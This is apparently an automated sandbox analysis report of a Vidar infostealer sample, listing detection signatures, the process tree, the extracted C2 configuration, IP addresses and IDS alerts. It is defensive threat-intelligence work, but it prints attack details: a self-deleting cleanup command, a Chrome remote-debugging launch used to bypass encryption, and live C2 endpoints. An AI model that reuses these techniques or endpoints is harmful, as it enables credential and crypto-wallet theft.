Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
sysadmin.exe

Overview

General Information

Sample name:sysadmin.exe
Analysis ID:1590244
MD5:e5f9640fb525c58fec8901b16f41c9a5
SHA1:eceb9a21a0805ae9c52e6cc5a38261664b4a108c
SHA256:f968314562778f694014b3c0c53af289f3a194386f7ad7a8167c1c6c838c29d0
Tags:exeuser-N3utralZ0ne
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious Malware Callback Communication
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • sysadmin.exe (PID: 7260 cmdline: "C:\Users\user\Desktop\sysadmin.exe" MD5: E5F9640FB525C58FEC8901B16F41C9A5)
    • csc.exe (PID: 7300 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jhtixtpk\jhtixtpk.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 7308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 7364 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8D13.tmp" "c:\Users\user\AppData\Local\Temp\jhtixtpk\CSCCDB7263B207A4F1CADFD2FC19D91DBC.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • RegAsm.exe (PID: 7412 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • chrome.exe (PID: 7532 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 7828 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2564 --field-trial-handle=2280,i,2341868853609439944,236191859647242175,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • cmd.exe (PID: 5804 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\3wtj5" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 6064 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199816275252", "Botnet": "js4tn"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
sysadmin.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

    PCAP (Network Traffic)

    SourceRuleDescriptionAuthorStrings
    sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000004.00000002.2322975178.0000000000EDD000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmpinfostealer_win_vidar_strings_nov23Finds Vidar samples based on the specific stringsSekoia.io
        • 0x53b8d:$str01: MachineID:
        • 0x53bb6:$str02: Work Dir: In memory
        • 0x53c50:$str03: [Hardware]
        • 0x53c85:$str04: VideoCard:
        • 0x53c92:$str05: [Processes]
        • 0x53c9f:$str06: [Software]
        • 0x53cab:$str07: information.txt
        • 0x53cbc:$str08: %s\*
        • 0x53df3:$str08: %s\*
        • 0x52ad4:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
        • 0x5264f:$str17: build_id
        • 0x52687:$str18: file_data
        Process Memory Space: RegAsm.exe PID: 7412JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          4.2.RegAsm.exe.400000.0.raw.unpackinfostealer_win_vidar_strings_nov23Finds Vidar samples based on the specific stringsSekoia.io
          • 0x53b8d:$str01: MachineID:
          • 0x53bb6:$str02: Work Dir: In memory
          • 0x53c50:$str03: [Hardware]
          • 0x53c85:$str04: VideoCard:
          • 0x53c92:$str05: [Processes]
          • 0x53c9f:$str06: [Software]
          • 0x53cab:$str07: information.txt
          • 0x53cbc:$str08: %s\*
          • 0x53df3:$str08: %s\*
          • 0x52ad4:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
          • 0x5264f:$str17: build_id
          • 0x52687:$str18: file_data
          0.0.sysadmin.exe.1a6bdf60000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Potentially Suspicious Malware Callback Communication
            Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 85.192.63.194, DestinationIsIpv6: false, DestinationPort: 7777, EventID: 3, Image: C:\Users\user\Desktop\sysadmin.exe, Initiated: true, ProcessId: 7260, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
            Sigma detected: Browser Started with Remote Debugging
            Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 7412, ParentProcessName: RegAsm.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 7532, ProcessName: chrome.exe
            Sigma detected: Dynamic .NET Compilation Via Csc.EXE
            Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jhtixtpk\jhtixtpk.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jhtixtpk\jhtixtpk.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\sysadmin.exe", ParentImage: C:\Users\user\Desktop\sysadmin.exe, ParentProcessId: 7260, ParentProcessName: sysadmin.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jhtixtpk\jhtixtpk.cmdline", ProcessId: 7300, ProcessName: csc.exe
            Sigma detected: Dynamic CSharp Compile Artefact
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\sysadmin.exe, ProcessId: 7260, TargetFilename: C:\Users\user\AppData\Local\Temp\jhtixtpk\jhtixtpk.cmdline

            Data Obfuscation

            barindex
            Sigma detected: Dot net compiler compiles file from suspicious location
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jhtixtpk\jhtixtpk.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jhtixtpk\jhtixtpk.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\sysadmin.exe", ParentImage: C:\Users\user\Desktop\sysadmin.exe, ParentProcessId: 7260, ParentProcessName: sysadmin.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jhtixtpk\jhtixtpk.cmdline", ProcessId: 7300, ProcessName: csc.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-13T20:18:13.977147+010020442471Malware Command and Control Activity Detected116.203.166.124443192.168.2.449735TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-13T20:18:15.337689+010020518311Malware Command and Control Activity Detected116.203.166.124443192.168.2.449736TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-13T20:18:12.636616+010020490871A Network Trojan was detected192.168.2.449734116.203.166.124443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-13T20:18:11.292842+010028593781Malware Command and Control Activity Detected192.168.2.449733116.203.166.124443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Found malware configuration
            Source: 0.2.sysadmin.exe.1a6bfe6af88.3.raw.unpackMalware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199816275252", "Botnet": "js4tn"}
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040C009 CryptUnprotectData,4_2_0040C009
            Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 116.203.166.124:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: sysadmin.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: k.pdb~ source: sysadmin.exe, 00000000.00000002.1727202980.000001A6BE2A4000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\Administrator\Desktop\HeliosDisplayManagement-master\Release\HeliosDisplayManagement.pdb source: sysadmin.exe
            Source: Binary string: ]c:\borrar\EmptyDll\Release\EmptyDll.pdb source: sysadmin.exe
            Source: Binary string: k.pdb source: sysadmin.exe, 00000000.00000002.1727202980.000001A6BE2A4000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\jhtixtpk\jhtixtpk.pdb source: sysadmin.exe, 00000000.00000002.1727704147.000001A6BFDE1000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: c:\borrar\EmptyDll\Release\EmptyDll.pdb source: sysadmin.exe
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\jhtixtpk\jhtixtpk.pdbhPj source: sysadmin.exe, 00000000.00000002.1727704147.000001A6BFDE1000.00000004.00000800.00020000.00000000.sdmp
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041008C FindFirstFileA,4_2_0041008C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00428248 FindFirstFileA,memset,memset,4_2_00428248
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042A4E5 FindFirstFileA,4_2_0042A4E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040E749 FindFirstFileA,4_2_0040E749
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040177C FindFirstFileA,4_2_0040177C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00412AC9 FindFirstFileA,4_2_00412AC9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040CCEA FindFirstFileA,4_2_0040CCEA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042BD1E FindFirstFileA,4_2_0042BD1E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004018DA FindFirstFileA,4_2_004018DA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00428DDA GetLogicalDriveStringsA,4_2_00428DDA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
            Source: chrome.exeMemory has grown: Private usage: 1MB later: 41MB

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.4:49734 -> 116.203.166.124:443
            Source: Network trafficSuricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.4:49733 -> 116.203.166.124:443
            Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.166.124:443 -> 192.168.2.4:49736
            Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.166.124:443 -> 192.168.2.4:49735
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199816275252
            Yara detected Generic Downloader
            Source: Yara matchFile source: sysadmin.exe, type: SAMPLE
            Source: Yara matchFile source: 0.0.sysadmin.exe.1a6bdf60000.0.unpack, type: UNPACKEDPE
            Source: global trafficTCP traffic: 192.168.2.4:49730 -> 85.192.63.194:7777
            Source: global trafficHTTP traffic detected: GET /no111p HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
            Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
            Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
            Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
            Source: Joe Sandbox ViewASN Name: LINEGROUP-ASRU LINEGROUP-ASRU
            Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040A09E recv,4_2_0040A09E
            Source: global trafficHTTP traffic detected: GET /no111p HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0Host: maximu.sbsConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: chrome.exe, 00000005.00000003.1855042351.00006A40003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1854958993.00006A4000F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1854772155.00006A4000F64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
            Source: chrome.exe, 00000005.00000003.1855042351.00006A40003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1854958993.00006A4000F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1854772155.00006A4000F64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const 